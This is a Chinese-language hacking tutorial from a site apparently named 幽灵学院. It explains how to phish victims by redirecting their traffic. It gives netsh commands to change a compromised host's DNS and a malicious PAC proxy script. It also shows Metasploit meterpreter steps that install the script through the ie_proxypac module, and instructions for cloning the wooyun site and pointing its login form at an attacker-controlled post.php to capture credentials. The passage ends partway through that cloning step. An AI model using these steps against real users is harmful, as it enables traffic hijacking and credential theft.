幽灵学院 - 菜鸟起航从这里开始!

幽灵学院 - 中国最权威的网络安全门户网站!

当前位置: > 黑客技术 > Exploit >

通过.PAC进行网络钓鱼

通过.PAC进行网络钓鱼

0x00 常见网络钓鱼方式

攻击者进行网络钓鱼的方式常有以下几种:

1. 通过修改受害者hosts文件( C:\WINDOWS\system32\drivers\etc\hosts )来实现;

2. 通过修改受害者dns来实现;

3. 已经进入路由器,直接修改路由器的DNS。

罗列的并不全,之后遇到的话再补充,上述三种方式很常见。

修改HOSTS文件,即攻击者修改受害者HOSTS文件为如下形式:

127.0.0.1 localhost x.x.x.x

这样就受害者访问会直接访问到x.x.x.x。在msf中可以使用 inject_host 脚本来实现。

修改dns进行攻击:

攻击者可是使用如下命令修改受害者的dns地址( 管理员身份执行 ):

C:\Windows\system32>netsh interface ip show interfaces Idx Met MTU 状态 名称 --- --- ----- ----------- ------------------- 1 50 4294967295 connected Loopback Pseudo-Interface 1 10 10 1500 connected 本地连接 C:\Windows\system32>netsh interface ip set dns "本地连接" static 192.168.1.100 C:\Windows\system32>ipconfig /all | findstr 192.168.1.100 DNS 服务器 . . . . . . . . . . . : 192.168.1.100

这样就修改了受害者的DNS地址,之后可以使用msf的 fakedns 来架设dns服务器来修改域名的解析地址。

除了直接修改路由器的DNS地址的以上两种方式在某些环境下还是有一些缺点的,例如,一些牛逼的AV会检测到文件的修改而发出报警,除此之外,如果受害者所处内网环境中的防火墙或路由器拦截对外部的DNS请求,修改受害者DNS的攻击方式并不能生效(因为攻击者架设的DNS在外网环境下)。

0x01 通过PAC代理

本文主要介绍的是Metasploit中的一个模块 ie_proxypac 。通过 .PAC(自动配置代理) 文件来完全控制IE的用户流量。只需要修改PAC文件,攻击者就能使受害者访问的某个域名指向攻击者的IP。虽然没有修改DNS但是可以达到同样的效果,且这种方式较为隐蔽。 已经有很多人使用这种方式进行网络钓鱼 。

下面是一个PAC文件示例:

function FindProxyForURL(url, host) { if (shExpMatch(host, "")) { return "PROXY 192.168.52.129:80; DIRECT"; } if (shExpMatch(host, "")) { return "PROXY 192.168.52.129:80; DIRECT"; } }

这个文件的配置是当受害者访问以及时,他会直接请求到攻击者ip( 192.168.52.129)。

详细的PAC编写请查看。

将以上脚本保存为test.pac,在获取meterpreter会话的基础上使用ie_proxypac脚本:

#!bash meterpreter > background [*] Backgrounding session 1... msf > use post/windows/manage/ie_proxypac msf post(ie_proxypac) > set session 1 session => 1 msf post(ie_proxypac) > set REMOTE_PAC REMOTE_PAC => msf post(ie_proxypac) > show options Module options (post/windows/manage/ie_proxypac): Name Current Setting Required Description ---- --------------- -------- ----------- AUTO_DETECT false yes Automatically detect settings. DISABLE_PROXY false yes Disable the proxy server. LOCAL_PAC no Local PAC file. REMOTE_PAC no Remote PAC file. (Ex: ) SESSION 1 yes The session to run this module on. msf post(ie_proxypac) > exploit [*] Setting automatic configuration script from local PAC file ... [+] Automatic configuration script configured... [*] Post module execution completed

之后打开ie,internet选项->连接->局域网设置:

通过.PAC进行网络钓鱼

可以看到pac已经使用pac文件进行了代理。

代理尽量使用 远程代理 ,因为IE11默认禁止本地代理,如果使用本地代理,代理是无效的。 详情 测试发现,如果连接了vpn,pac代理是失效的。

现在再访问 , ,会看到已经转移到了我们制定的ip:

通过.PAC进行网络钓鱼

0x02 能做什么

这里我们修改pac文件如下:

function FindProxyForURL(url, host) { if (shExpMatch(host, "")) { return "PROXY 192.168.52.129:80; DIRECT"; } }

这里ip要改成自己的web的ip,如果受害者请求的网站host为 时,满足规则,然后跳转到我们指定的ip地址,这里我们可以来构造钓鱼。

打开wooyun,右键查看源代码,将所有源代码保存为index.html,放在网站根目录下,因为当受害者请求 ,其host为 wooyun.org 不满足代理条件,就会直接请求,所以我们把源代码中的 ,改为 wooyun.org :

通过.PAC进行网络钓鱼

然后找到url,src,href标签,修改为 的形式,比如

#!html <link href="/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/>

修改为

#!html <link href="?v=201501291909" rel="stylesheet" type="text/css"/>

改完以后,基本上就算克隆成功了:

通过.PAC进行网络钓鱼

下来要把登陆页面的的源码复制过来,打开 ?action=login ,右键复制源码,保存为user.php,放在网站根目录下,修改源码中的url,src,href。修改完之后,打开index.html文件,定位 登录 ,修改href为 user.php?action=login ,修改以后此标签为:

#!html <a href="user.php?action=login">登录</a> | <a href="?action=register" class="reg">注册</a>

打开user.php,定位 用户登录 表单,修改表单action为post.php:

#!html <a href="#">用户登录</a></div> </div> <form action="post.php" method="POST"> ..... (责任编辑:幽灵学院)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
用户名: 验证码: 点击我更换图片
栏目列表
推荐内容
1700055555@qq.com 工作日:9:00-21:00
周 六:9:00-18:00
  扫一扫关注幽灵学院